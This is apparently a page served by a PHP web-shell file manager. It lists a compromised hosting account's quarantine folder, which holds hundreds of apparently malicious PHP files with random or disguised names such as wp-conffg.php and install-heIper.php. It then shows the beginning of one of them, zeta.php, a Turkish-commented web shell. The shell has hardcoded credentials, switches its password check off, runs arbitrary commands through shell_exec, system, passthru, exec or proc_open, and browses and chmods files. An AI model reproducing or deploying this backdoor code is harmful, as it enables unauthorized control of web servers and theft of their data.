golden hour
/home2/nemzcoma/.quarantine
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess_1ed26g38
265 B
Del
OK
.htaccess_80253gf3
265 B
Del
OK
.htaccess_8a15d87c
265 B
Del
OK
.htaccess_c1fdg68a
265 B
Del
OK
.htaccess_fae21031
265 B
Del
OK
.tmp_stealth17750518124789051_354b4268
14.19 KB
Del
OK
.tmp_stealth17750518349255163_64hgd1hh
14.19 KB
Del
OK
12daygood.php_4f7e1chf
76.62 KB
Del
OK
133.php_1062b5e2
26.64 KB
Del
OK
155.php.tar_14bdg1g1
33 KB
Del
OK
155.php.tar_b7877a2f
33 KB
Del
OK
155.php_1gd1h1g5
152.82 KB
Del
OK
155.php_ec4a1082
152.82 KB
Del
OK
177.php_6c27a867
152.68 KB
Del
OK
199.php_5777ae85
121.51 KB
Del
OK
222.php_3had5gg2
15.76 KB
Del
OK
222.php_44g878fc
15.76 KB
Del
OK
222.php_53cb7a15
15.76 KB
Del
OK
222.php_74f83fgb
15.76 KB
Del
OK
222.php_8b51a77c
15.76 KB
Del
OK
222.php_bca37c5c
15.78 KB
Del
OK
222.php_da3f1584
15.76 KB
Del
OK
222.php_e742h807
15.76 KB
Del
OK
2index.php_601b856c
10.7 KB
Del
OK
404.php_58a52e4c
46.96 KB
Del
OK
56839_588c0c24
420 B
Del
OK
67473_57cf3fe5
419 B
Del
OK
6ap7e.php_24a81g31
77.47 KB
Del
OK
Al7.php_e4g5f25g
565 B
Del
OK
Cap.php_fecea33b
77.26 KB
Del
OK
Do Not Delete.zip_7f454ba2
933 B
Del
OK
Pan7her-plugin.php_c07d03gd
2.35 KB
Del
OK
Wp-covid-mb.php.tar_1e133hd1
78 KB
Del
OK
about.php_48d54ed3
1.4 KB
Del
OK
about.php_a7hf5f44
3.69 KB
Del
OK
about.php_d61fad01
1.4 KB
Del
OK
about.php_ea11g1h5
17.29 KB
Del
OK
acp.php_2a373b03
178.11 KB
Del
OK
admin.php_103f6d63
1.05 MB
Del
OK
admin.php_1b77g7eb
1.05 MB
Del
OK
admin.php_40gc567b
41.11 KB
Del
OK
admin.php_46121fb8
1.05 MB
Del
OK
admin.php_4a28dhe8
125.25 KB
Del
OK
admin.php_4cd0dhh1
5.24 KB
Del
OK
admin.php_5hfb714a
87.67 KB
Del
OK
admin.php_71h1847c
5.24 KB
Del
OK
admin.php_8d3486ed
77.43 KB
Del
OK
admin.php_a2e45ad0
32.18 KB
Del
OK
admin.php_aa78ce5d
19.13 KB
Del
OK
admin.php_b51e7052
5.24 KB
Del
OK
admin.php_ccb3ceec
32.18 KB
Del
OK
admin.php_e17cfb8f
32.18 KB
Del
OK
admin.php_g4eh10ff
19.11 KB
Del
OK
adminfuns.php_ba41f4a5
173.77 KB
Del
OK
adminfuns.php_bh6fcgch
173.77 KB
Del
OK
agulnson.php_3e27bd5f
166.51 KB
Del
OK
ammika.php_6bd8a5c5
19.14 KB
Del
OK
aqffbglk.php_844ce0gd
168.58 KB
Del
OK
archive.php_7e65hgb2
14.76 KB
Del
OK
archive.php_b2f42138
14.76 KB
Del
OK
as.php_13f1e48g
33.19 KB
Del
OK
atpmoagh.php_e14e0371
168.59 KB
Del
OK
blackPrivet.php_a0bc0f7h
7.17 KB
Del
OK
buy.php_678850h2
1.46 KB
Del
OK
buy.php_6b024e06
1.48 KB
Del
OK
buy.php_f7e16d0g
1.48 KB
Del
OK
cap.php_db4fd1b4
8.47 KB
Del
OK
cap.php_h472e4f8
8.47 KB
Del
OK
carev.php_237d07e4
78.16 KB
Del
OK
caydyamw.php_ce48b784
168.62 KB
Del
OK
cbfaxywfxw.php_7ge7fa03
2.06 KB
Del
OK
cbfaxywfxw.php_dgd114f6
2.06 KB
Del
OK
cjiwridm.php_d47784ga
166.51 KB
Del
OK
coffee.tar_bdh2bddc
178.5 KB
Del
OK
colors.zip_da7h3030
870.61 KB
Del
OK
comment-content.tar_0d3hd63h
117 KB
Del
OK
comment-content.zip_ea3c6876
111.91 KB
Del
OK
content.php_a54a5c12
17.36 KB
Del
OK
coordjktrb.php_28812ga2
2.06 KB
Del
OK
cvmdhnlg.php_77g8c3b1
168.58 KB
Del
OK
cyjgosfm.php_faga5b3b
14.76 KB
Del
OK
czhdwhna.php_6g4edb8a
168.59 KB
Del
OK
dccpptbfcj.php_bcaf33f8
2.06 KB
Del
OK
ddllcfjo.php_a6h6ggbg
166.5 KB
Del
OK
default.php_3288ee1d
851 B
Del
OK
default.php_a1edc636
5.13 KB
Del
OK
defaults.php_c85h8aef
1.93 KB
Del
OK
defvpyazgx.php_bhc700fb
2.06 KB
Del
OK
dzhkpqeino.php_0bb2b634
2.06 KB
Del
OK
dzhkpqeino.php_g54447aa
2.06 KB
Del
OK
eaycvhzjhp.php_0d6b5b44
1.5 KB
Del
OK
edit.php_30331bg7
17.28 KB
Del
OK
eek.php_5175e56a
15.66 KB
Del
OK
eigvcvxi.php_1c2bb685
14.76 KB
Del
OK
eikuafrp.php_a83d701c
166.51 KB
Del
OK
epnajzqj.php_5ebca1e5
166.5 KB
Del
OK
eqgueytq.php_b03g35ad
168.59 KB
Del
OK
fctwgoug.php_c8g6ebf1
168.58 KB
Del
OK
fetch.php_h03ge4cd
2.13 KB
Del
OK
filefuns.php_16abceb3
5.52 KB
Del
OK
filefuns.php_1hf2b50f
5.08 KB
Del
OK
filefuns.php_a4h0af70
5.08 KB
Del
OK
fnclunnskq.php_2ach6fbc
2.06 KB
Del
OK
foyqjhha.php_04h482a2
14.76 KB
Del
OK
ftde.php_bcg71fec
21.5 KB
Del
OK
geju.php_5fga4gac
181 B
Del
OK
gfherhfghre.tar_03840c3e
140.5 KB
Del
OK
gfherhfghre.zip_ae44efg0
330.59 KB
Del
OK
giplxdedyh.php_a8b1g5h3
2.06 KB
Del
OK
gmryhckjuu.php_5cege543
2.06 KB
Del
OK
goods.php_1e720d6e
173.77 KB
Del
OK
goods.php_22c2hf7c
173.77 KB
Del
OK
goods.php_27h36gf0
173.77 KB
Del
OK
goods.php_410h45g5
173.77 KB
Del
OK
goods.php_44b215ab
173.77 KB
Del
OK
goods.php_acg3h704
173.77 KB
Del
OK
goods.php_agg47806
173.77 KB
Del
OK
goods.php_h6b84ff8
173.77 KB
Del
OK
gtoffyeu.php_5aged7dg
166.51 KB
Del
OK
gujjrkzs.php_115hd280
168.58 KB
Del
OK
gvxxvfnu.php_1gf338eb
166.51 KB
Del
OK
henglywt.php_58610d37
14.76 KB
Del
OK
hiroshi.php_1gdb6ch5
18.34 KB
Del
OK
hiroshi.php_5b4d04c0
7.31 KB
Del
OK
hiroshi.php_habaggce
6.19 KB
Del
OK
hypdiejx.php_5051b45c
14.76 KB
Del
OK
hypmxgwkee.php_00h0gd15
2.06 KB
Del
OK
index.php_002b4e7g
14.76 KB
Del
OK
index.php_024e51a4
14.76 KB
Del
OK
index.php_02a837de
14.76 KB
Del
OK
index.php_08521e0c
35.02 KB
Del
OK
index.php_08c64fh2
9.64 KB
Del
OK
index.php_0a62571d
6.25 KB
Del
OK
index.php_0h7480dh
38.58 KB
Del
OK
index.php_12adcbh7
155 B
Del
OK
index.php_1304f520
14.76 KB
Del
OK
index.php_135ad71d
14.76 KB
Del
OK
index.php_13c5e8h4
14.76 KB
Del
OK
index.php_168hah4f
14.76 KB
Del
OK
index.php_1a30ee6b
14.76 KB
Del
OK
index.php_1cf1e001
14.76 KB
Del
OK
index.php_2051b8d2
38.58 KB
Del
OK
index.php_27fh3ec4
5.91 KB
Del
OK
index.php_2a8a32c7
14.76 KB
Del
OK
index.php_2c858a57
2.75 KB
Del
OK
index.php_2fa41620
14.76 KB
Del
OK
index.php_2g885402
14.76 KB
Del
OK
index.php_305d3dgf
17.45 KB
Del
OK
index.php_3080fd0d
38.58 KB
Del
OK
index.php_31254acg
14.76 KB
Del
OK
index.php_328701cb
14.76 KB
Del
OK
index.php_348710fd
14.76 KB
Del
OK
index.php_37bhfce6
14.76 KB
Del
OK
index.php_38bf07af
18.11 KB
Del
OK
index.php_3cefc7g3
6.21 KB
Del
OK
index.php_3fdd36d6
38.58 KB
Del
OK
index.php_3gfbdb4e
14.76 KB
Del
OK
index.php_424d8720
14.76 KB
Del
OK
index.php_450fa42g
14.76 KB
Del
OK
index.php_45ce4446
14.76 KB
Del
OK
index.php_45hbd7ed
38.58 KB
Del
OK
index.php_486066fa
320 B
Del
OK
index.php_4a2g1808
38.58 KB
Del
OK
index.php_4bddg858
38.58 KB
Del
OK
index.php_4bfeb621
38.58 KB
Del
OK
index.php_4cfhe022
86.65 KB
Del
OK
index.php_4dg863gb
14.76 KB
Del
OK
index.php_4fhe0g60
38.58 KB
Del
OK
index.php_4h64350b
14.76 KB
Del
OK
index.php_523g02a4
38.58 KB
Del
OK
index.php_52ab7422
1.93 KB
Del
OK
index.php_546a5h85
14.76 KB
Del
OK
index.php_551af748
14.76 KB
Del
OK
index.php_552g7g55
14.76 KB
Del
OK
index.php_55e6ga6g
38.58 KB
Del
OK
index.php_562ae1e1
38.58 KB
Del
OK
index.php_5bfb3385
14.76 KB
Del
OK
index.php_5db06fb3
320 B
Del
OK
index.php_5f0fh76g
14.76 KB
Del
OK
index.php_6241gbbb
14.76 KB
Del
OK
index.php_6860ghec
1.93 KB
Del
OK
index.php_6agfe1eg
14.76 KB
Del
OK
index.php_6fd554h8
14.76 KB
Del
OK
index.php_6ff7fgdb
219 B
Del
OK
index.php_6fh71218
14.76 KB
Del
OK
index.php_6gh0b77d
14.76 KB
Del
OK
index.php_7151h71h
14.76 KB
Del
OK
index.php_723765eh
2 KB
Del
OK
index.php_72a2428f
38.58 KB
Del
OK
index.php_74hf56ba
1.66 KB
Del
OK
index.php_7517cg8c
1.87 KB
Del
OK
index.php_76h73370
6.98 KB
Del
OK
index.php_7757617h
14.76 KB
Del
OK
index.php_7bbd52g1
14.76 KB
Del
OK
index.php_7d3g1c4d
2.75 KB
Del
OK
index.php_7dhhfeg5
14.76 KB
Del
OK
index.php_7e57gb0d
14.76 KB
Del
OK
index.php_7ef7e4db
14.76 KB
Del
OK
index.php_7hc1e6g2
1.17 KB
Del
OK
index.php_80h8c2cb
424 B
Del
OK
index.php_854ebc4c
14.76 KB
Del
OK
index.php_8e8218eg
38.58 KB
Del
OK
index.php_8had6573
6.98 KB
Del
OK
index.php_a0022g32
14.76 KB
Del
OK
index.php_a01efh35
1.29 KB
Del
OK
index.php_a2f3f6gb
419 B
Del
OK
index.php_a5647edd
14.76 KB
Del
OK
index.php_a84c5682
14.76 KB
Del
OK
index.php_a8c54hb4
14.76 KB
Del
OK
index.php_ac65f5he
431 B
Del
OK
index.php_ac8010g3
6.98 KB
Del
OK
index.php_ad2a4d0e
14.76 KB
Del
OK
index.php_afah2182
14.76 KB
Del
OK
index.php_b0d75fg8
14.76 KB
Del
OK
index.php_b553b576
14.76 KB
Del
OK
index.php_b5eg1f8a
14.76 KB
Del
OK
index.php_b6bch211
14.76 KB
Del
OK
index.php_bd10d1b2
431 B
Del
OK
index.php_bgf01736
5.23 KB
Del
OK
index.php_bhdg67h8
38.58 KB
Del
OK
index.php_c07a00da
14.76 KB
Del
OK
index.php_c20617ae
38.58 KB
Del
OK
index.php_c27736e5
14.76 KB
Del
OK
index.php_c3h451e0
14.76 KB
Del
OK
index.php_c6g0d0d6
14.76 KB
Del
OK
index.php_c7f06dbb
1.14 KB
Del
OK
index.php_ce0856ag
35.02 KB
Del
OK
index.php_ch28a4fe
2.03 KB
Del
OK
index.php_d2ec520f
14.76 KB
Del
OK
index.php_d325dc3e
1.72 KB
Del
OK
index.php_d3bf16b6
14.76 KB
Del
OK
index.php_d8786h2f
14.76 KB
Del
OK
index.php_dc81e17d
14.76 KB
Del
OK
index.php_dd20e1he
14.76 KB
Del
OK
index.php_ddf1f8hf
14.76 KB
Del
OK
index.php_dgabc03b
14.76 KB
Del
OK
index.php_e4b56e33
14.76 KB
Del
OK
index.php_e4gfb1bb
14.76 KB
Del
OK
index.php_e6eg1e1a
14.76 KB
Del
OK
index.php_e78d8fhh
14.76 KB
Del
OK
index.php_ec5ae8bg
6.72 KB
Del
OK
index.php_ef04g777
14.76 KB
Del
OK
index.php_f66h7hdg
14.76 KB
Del
OK
index.php_f8fb6fhf
431 B
Del
OK
index.php_fec86gd7
38.58 KB
Del
OK
index.php_ff0fh282
219 B
Del
OK
index.php_fheh3eda
14.76 KB
Del
OK
index.php_g2g66b8e
14.76 KB
Del
OK
index.php_g31aadg5
431 B
Del
OK
index.php_gb38g350
14.76 KB
Del
OK
index.php_h5a3g2ce
14.76 KB
Del
OK
index.php_h7dhbg63
431 B
Del
OK
index.php_h85688ca
431 B
Del
OK
index.php_hebdg1h6
14.76 KB
Del
OK
index.php_hg86827c
14.76 KB
Del
OK
install-heIper.php_0fd4bgcg
574 B
Del
OK
install-heIper.php_532a2fgc
219.63 KB
Del
OK
ipnfmkpg.php_603dc061
168.58 KB
Del
OK
ipzfxehz.php_b2f8e7d8
168.58 KB
Del
OK
item.php_32bd52bg
1.29 KB
Del
OK
item.php_7c081d50
78.32 KB
Del
OK
ivqhfgpxhi.php_4e2d7gf1
1.5 KB
Del
OK
jbjyknffdu.php_538h0f46
2.06 KB
Del
OK
jbjyknffdu.php_f567a463
2.06 KB
Del
OK
jbtkjmyh.php_cg8h4304
166.51 KB
Del
OK
jeqvcuytep.php_4aed4e5c
2.06 KB
Del
OK
jizlzrsp.php_66fdbhbh
14.76 KB
Del
OK
jj.php_3g347a35
14.43 KB
Del
OK
jj.php_7dgce8fg
14.43 KB
Del
OK
jj.php_7f7fb625
14.43 KB
Del
OK
jj.php_80age0ba
14.43 KB
Del
OK
jj.php_a0h55a77
14.43 KB
Del
OK
jtjtlplj.php_3h26673d
166.51 KB
Del
OK
jwbvbljs.php_1da5bgde
168.58 KB
Del
OK
kbenxqtoxi.php_h3a4b8fd
2.06 KB
Del
OK
kgybsldp.php_4a3b28e7
168.58 KB
Del
OK
koghbbjp.php_dhf64ahh
14.76 KB
Del
OK
kvdjmgnh.php_2814751g
14.76 KB
Del
OK
kxahhzadkr.php_7bccfb40
1.5 KB
Del
OK
kxinetrt.php_3cf630b3
168.58 KB
Del
OK
kzpvmkbe.php_4d448708
168.59 KB
Del
OK
lgwprosb.php_16df7g4g
166.51 KB
Del
OK
livhstwc.php_c4e58e85
14.76 KB
Del
OK
lock360.php_b58hfd5g
1.4 KB
Del
OK
lqcnojbo.php_d6d0efhc
166.51 KB
Del
OK
lurtqlar.php_c63had02
168.58 KB
Del
OK
lvxsorgdsx.php_62h855b6
2.06 KB
Del
OK
lwqtcnztbn.php_gdg86eg4
1.5 KB
Del
OK
lxgsjquj.php_g47gf0g7
168.58 KB
Del
OK
lzujubgmgg.php_1fe84baf
2.06 KB
Del
OK
lzujubgmgg.php_7hc35a32
2.06 KB
Del
OK
mah.php_10e82b8e
1.4 KB
Del
OK
mah.php_7ah2c3fc
1.4 KB
Del
OK
mah.php_d6fbhdaa
1.4 KB
Del
OK
maxngmtc.php_ae521b04
166.51 KB
Del
OK
mewhkxdz.php_7e3064f5
168.58 KB
Del
OK
mhprvdlb.php_434a6551
168.58 KB
Del
OK
minik.php_064hc200
12.41 KB
Del
OK
minik.php_ge53a0b6
12.41 KB
Del
OK
mnevqljr.php_h4h7bceg
168.58 KB
Del
OK
mptwzeux.php_1f3800gh
14.76 KB
Del
OK
msegtfftof.php_7aah4hd2
2.06 KB
Del
OK
naathfag.php_32e8fg20
168.58 KB
Del
OK
nefrcqnt.php_673h7be1
168.58 KB
Del
OK
nfbuqnbl.php_4fbbaa2h
14.76 KB
Del
OK
nlftnmqh.php_400fh080
166.51 KB
Del
OK
nonomnag.php_522da5f8
166.51 KB
Del
OK
ntcwvmfkva.php_6e2ba73h
2.06 KB
Del
OK
nwflm.php_44f0f683
2.16 MB
Del
OK
nwflm.php_c6102hb0
2.16 MB
Del
OK
nwsnnfuk.php_d1d5181e
168.58 KB
Del
OK
oaefvwpt.php_54gca118
168.58 KB
Del
OK
oajxsiov.php_6dege02e
168.58 KB
Del
OK
obtwyduy.php_00cb434d
168.58 KB
Del
OK
oiiirceg.php_a3fg1cgh
168.58 KB
Del
OK
olbcljui.php_64d13bdg
168.58 KB
Del
OK
olkpcaihxz.php_01128b7h
1.5 KB
Del
OK
onlqnphypz.php_18h40aaf
2.06 KB
Del
OK
onlqnphypz.php_d5e5575b
2.06 KB
Del
OK
ophpdiyc.php_841b8723
168.58 KB
Del
OK
product.php_c1hebg06
2.03 KB
Del
OK
pyucbkvp.php_gf33157h
14.76 KB
Del
OK
qbjvgalx.php_b8feh7fa
14.76 KB
Del
OK
radio.php_0e6d3b34
17.29 KB
Del
OK
radio.php_85b4h2ge
22.06 KB
Del
OK
rawr2.php_243hf70f
101.3 KB
Del
OK
rcmgkjri.php_2c42cc11
166.51 KB
Del
OK
rdmysiml.php_2b726cf5
168.58 KB
Del
OK
rgjycvvu.php_806a603b
168.58 KB
Del
OK
rjaoekjdqp.php_ebh0d4d3
1.5 KB
Del
OK
rthwmrtk.php_fh52h1b0
14.76 KB
Del
OK
rtsjddkvad.php_4022af04
2.06 KB
Del
OK
s.php_25c08c85
6.76 KB
Del
OK
saiga.php_4152d2b5
8.89 KB
Del
OK
saiga.php_hd020fd7
13.4 KB
Del
OK
sbkxvkjr.php_b338fgb8
168.58 KB
Del
OK
sc.php_2hc03cah
177.99 KB
Del
OK
sciokkqf.php_gh75ba35
168.58 KB
Del
OK
sesnnlcz.php_ca8e14g1
14.76 KB
Del
OK
slider.php_16dc0cc4
46.96 KB
Del
OK
slkzvwlk.php_g0470334
168.58 KB
Del
OK
ss.php_8g353dhc
13.5 KB
Del
OK
style.php_3dcbe1bh
13.37 KB
Del
OK
style.php_c2b8fe4g
13.37 KB
Del
OK
style.php_d734b5fh
13.37 KB
Del
OK
style.php_eh7c550a
13.37 KB
Del
OK
su.php_4661dh04
77.12 KB
Del
OK
su.php_dbec5868
77.12 KB
Del
OK
su.php_eg3dcf52
77.12 KB
Del
OK
supzaayg.php_2846d6hc
168.58 KB
Del
OK
swmqaomt.php_34648h82
168.58 KB
Del
OK
symlnkgd.php_8ggaf63e
14.19 KB
Del
OK
symlnkgd.php_f74hdd38
14.19 KB
Del
OK
syxioxdi.php_f706348f
168.58 KB
Del
OK
tccbrjyo.php_cfgef148
168.58 KB
Del
OK
tdfqpyis.php_ag0814d2
14.76 KB
Del
OK
thifeait.php_25e204ea
14.76 KB
Del
OK
tkvajdnf.php_151526ff
166.51 KB
Del
OK
tqkyqalj.php_a082e1h4
168.59 KB
Del
OK
ubbnjwsxtd.php_16ce5252
2.06 KB
Del
OK
ubsloncl.php_f68g3bc7
168.58 KB
Del
OK
ucpscowj.php_1h5hc1bb
168.58 KB
Del
OK
uftwrtfm.php_3f0517ec
168.58 KB
Del
OK
upwxvzdq.php_ec214b47
14.76 KB
Del
OK
vendoyters.tar_2gg8aahh
101.5 KB
Del
OK
vendoyters.zip_ee807f28
226.3 KB
Del
OK
vfyroihafh.php_acb775ff
2.06 KB
Del
OK
vheogeuhio.php_a332d500
2.06 KB
Del
OK
vhndghqj.php_h5g6c760
168.59 KB
Del
OK
vmmpmnbv.php_c816062a
168.58 KB
Del
OK
vpmgvmvf.php_3d7cg373
168.58 KB
Del
OK
vprbehyz.php_c624ea2e
168.58 KB
Del
OK
vrybkybi.php_d318fh2f
166.52 KB
Del
OK
vsrripyp.php_dg0838ab
166.51 KB
Del
OK
wcmkzqbk.php_f305hbb4
14.76 KB
Del
OK
whluhuej.php_0h06a0ea
168.58 KB
Del
OK
whoytnbj.php_463fag71
14.76 KB
Del
OK
wp-blog.php_076243eb
77.49 KB
Del
OK
wp-conffg.php_e1f00dc3
122.7 KB
Del
OK
wp-conffg.php_h422dch5
122.7 KB
Del
OK
wp-conffq.php_d276cdfd
147.36 KB
Del
OK
wp-links.gz_0fdef566
28.4 KB
Del
OK
wp-links.php_b8c1hhce
44 B
Del
OK
wp-links.php_cbb8fb61
233 B
Del
OK
wp-login.php_fe8g65hh
10.7 KB
Del
OK
wp-sx9.php_01c7f578
74.61 KB
Del
OK
wp-sx9.php_28860a88
74.61 KB
Del
OK
wp-sx9.php_bgfhd32f
74.59 KB
Del
OK
wp_oks.php_8b82h2c8
7.13 KB
Del
OK
wps.php_526f8444
16.57 KB
Del
OK
wukhlaxc.php_e414gf50
14.76 KB
Del
OK
xhrnlyun.php_02c226e4
14.76 KB
Del
OK
xjrjhlix.php_3bebaeca
14.76 KB
Del
OK
xlrcjokz.php_2g431504
166.52 KB
Del
OK
xmanager.php_2d7ag4cf
12.55 KB
Del
OK
xqwlszcimz.php_46703f07
1.5 KB
Del
OK
xsmofymf.php_d1caf65b
168.58 KB
Del
OK
xulctjkr.php_e0cgaf4e
14.76 KB
Del
OK
xwpg.php_2f6068d6
237.88 KB
Del
OK
xwx1.php_2c2g7ga5
8.99 MB
Del
OK
xxx.js_57cf8a3e
6.72 KB
Del
OK
ytmtofrb.php_2b3g3be6
168.58 KB
Del
OK
zeta.php_gc2bh5de
44.85 KB
Del
OK
zijdwkou.php_ac367h1f
168.59 KB
Del
OK
zkkzjzupzf.php_d4gd5373
2.06 KB
Del
OK
zlmveewc.php_a5cda347
166.51 KB
Del
OK
zqwdaldagw.php_6ha3b2gf
2.06 KB
Del
OK
zqwdaldagw.php_8eb0h61h
2.06 KB
Del
OK
zrvkwgcb.php_afce034c
168.59 KB
Del
OK
zwewyhes.php_bg6d64fd
168.58 KB
Del
OK
zwwpvctr.php_55b7d6eg
166.51 KB
Del
OK
Edit: zeta.php_gc2bh5de
<?php // !!!!! HATA AYIKLAMA AÇIK - Çalışırsa sonra kapat !!!!! error_reporting(E_ALL); ini_set('display_errors', 1); ini_set('log_errors', 1); // !!!!! HATA AYIKLAMA SONU !!!!! # Konfigurasyon $SHELL_VERSION = "v8.0 "; $sayfaSifreleme ='0'; // 1: Açık, 0: Kapalı $kullaniciAdi = 'zeta'; // DEĞİŞTİR BUNU AMK! $sifre = 'kaos'; // BUNU DA DEĞİŞTİR! // --- Oturum Yönetimi (Mesajlar için) --- if (session_status() == PHP_SESSION_NONE) { @session_start(); } # --- Yetki Kontrolü --- function yetkiKontrol($kullaniciAdi, $sifre) { /* ... önceki kod ... */ global $sayfaSifreleme; if($sayfaSifreleme =='1') { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != $kullaniciAdi || $_SERVER['PHP_AUTH_PW'] != $sifre) { header('WWW-Authenticate: Basic realm=" - ACCESS DENIED"'); header('HTTP/1.0 401 Unauthorized'); die('<!DOCTYPE html><html><head><title>ACCESS DENIED</title><body style="background:#000; color:#f00; font-family:monospace; text-align:center;"><h1>ACCESS DENIED!</h1></body></html>'); } } } yetkiKontrol($kullaniciAdi, $sifre); // --- Temel Helper Fonksiyonlar --- function formatSizeUnits($bytes) { /* ... önceki kod ... */ if ($bytes === false || $bytes === null) return '???'; if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; } function fileExtension($file) { /* ... önceki kod ... */ $file = rtrim($file, '/'); $pos = strrpos($file, '.'); if ($pos === false) { return ''; } return substr($file, $pos + 1); } function perms_to_string($perms) { if ($perms === false || $perms === null) return '????'; $info = ''; // Dosya türü - TÜM SATIRLARIN SONUNDA ; OLDUĞUNDAN EMİN OLALIM! if (($perms & 0xC000) == 0xC000) $info = 's'; // Socket elseif (($perms & 0xA000) == 0xA000) $info = 'l'; // Symbolic Link elseif (($perms & 0x8000) == 0x8000) $info = '-'; // Regular elseif (($perms & 0x6000) == 0x6000) $info = 'b'; // Block special <-- Burası veya öncesi olabilir elseif (($perms & 0x4000) == 0x4000) $info = 'd'; // Directory elseif (($perms & 0x2000) == 0x2000) $info = 'c'; // Character special elseif (($perms & 0x1000) == 0x1000) $info = 'p'; // FIFO pipe else $info = 'u'; // Unknown // İzinler $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } // Fonksiyonun kapandığından emin olalım function encodePath($path) { return str_replace(array('/', '\\'), array('__SLASH__', '__BSLASH__'), $path); } function decodePath($path) { return str_replace(array('__SLASH__', '__BSLASH__'), array('/', '\\'), $path); } function runCommand($cmd) { /* ... önceki kod ... */ $output = ''; $error = ''; $ret_val = -1; if (function_exists('shell_exec')) { $output = shell_exec($cmd . ' 2>&1'); } elseif (function_exists('system')) { ob_start(); system($cmd . ' 2>&1', $ret_val); $output = ob_get_contents(); ob_end_clean(); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd . ' 2>&1', $ret_val); $output = ob_get_contents(); ob_end_clean(); } elseif (function_exists('exec')) { exec($cmd . ' 2>&1', $output_array, $ret_val); $output = implode("\n", $output_array); } elseif (function_exists('proc_open')) { $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($cmd, $descriptorspec, $pipes); if (is_resource($process)) { fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[2]); $ret_val = proc_close($process); if (!empty($error)) $output .= "\nSTDERR:\n" . $error; } else { $output = "proc_open failed."; } } else { $output = "Command execution functions are disabled."; } return array('output' => htmlspecialchars(trim($output)), 'retval' => $ret_val); } // --- PATH Belirleme --- $script_path = dirname(__FILE__); $doc_root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $script_path; $current_path = $script_path; if (isset($_GET['p'])) { $decoded_p = decodePath($_GET['p']); $resolved_path = @realpath($decoded_p); if ($resolved_path !== false && @is_readable($resolved_path)) { $current_path = $resolved_path; } elseif (@file_exists($decoded_p) && @is_readable($decoded_p)) { $current_path = $decoded_p; } else { $current_path = $script_path; $_SESSION['message'] = 'Geçersiz veya okunamayan yol!'; $_SESSION['message_type'] = 'error'; } } $current_path = str_replace('\\', '/', $current_path); if ($current_path !== '/') { $current_path = rtrim($current_path, '/'); } if (empty($current_path)) { $current_path = '/'; } define("PATH", $current_path); // --- İkon Fonksiyonu --- function fileIcon($file) { /* ... önceki kod ... */ $full_path = PATH . '/' . $file; $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp", "ico"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc", "flac"); $video = array("mp4", "mov", "avi", "mkv", "webm", "flv", "wmv"); $code = array("php", "phtml", "html", "htm", "css", "js", "py", "sh", "json", "xml", "sql", "c", "cpp", "java", "rb", "go", "swift", "kt", "tpl", "ini", "conf"); $archive = array("zip", "rar", "tar", "gz", "7z", "bz2", "xz"); $doc = array("pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "odt", "ods", "odp"); $ext = strtolower(fileExtension($file)); if (@is_dir($full_path)) return '<i class="fas fa-folder-open hacker-icon-folder"></i> '; if ($file == "error_log") return '<i class="fas fa-bug hacker-icon-error"></i> '; if ($file == ".htaccess" || $file == ".htpasswd" || $file == "config" || strpos($file, '.conf') !== false || strpos($file, '.ini') !== false) return '<i class="fas fa-cogs hacker-icon-config"></i> '; if (in_array($ext, $code)) return '<i class="fas fa-code hacker-icon-code"></i> '; if (in_array($ext, $imgs)) return '<i class="fas fa-file-image hacker-icon-image"></i> '; if (in_array($ext, $audio)) return '<i class="fas fa-file-audio hacker-icon-audio"></i> '; if (in_array($ext, $video)) return '<i class="fas fa-file-video hacker-icon-video"></i> '; if (in_array($ext, $archive)) return '<i class="fas fa-file-archive hacker-icon-archive"></i> '; if (in_array($ext, $doc)) return '<i class="fas fa-file-pdf hacker-icon-doc"></i> '; if ($ext == "txt" || $ext == "md" || $ext == "log") return '<i class="fas fa-file-alt hacker-icon-text"></i> '; return '<i class="fas fa-file hacker-icon-default"></i> '; } // --- POST ve GET İşlemleri --- $message = isset($_SESSION['message']) ? $_SESSION['message'] : ''; $message_type = isset($_SESSION['message_type']) ? $_SESSION['message_type'] : ''; unset($_SESSION['message'], $_SESSION['message_type']); $action_result_output = ''; // Komut, analiz vb. çıktılar için // GET İşlemleri if ($_SERVER['REQUEST_METHOD'] === 'GET') { /* ... önceki GET işlemleri ... */ if (isset($_GET['chmod']) && isset($_GET['file'])) { /* chmod */ $file_to_chmod = PATH . '/' . urldecode($_GET['file']); $new_perm = intval($_GET['chmod'], 8); if (file_exists($file_to_chmod)) { if (@chmod($file_to_chmod, $new_perm)) { $_SESSION['message'] = 'Perms set to ' . sprintf('%o', $new_perm) . '!'; $_SESSION['message_type'] = 'success'; } else { $_SESSION['message'] = 'Error: Chmod failed!'; $_SESSION['message_type'] = 'error'; } } else { $_SESSION['message'] = 'Error: File not found!'; $_SESSION['message_type'] = 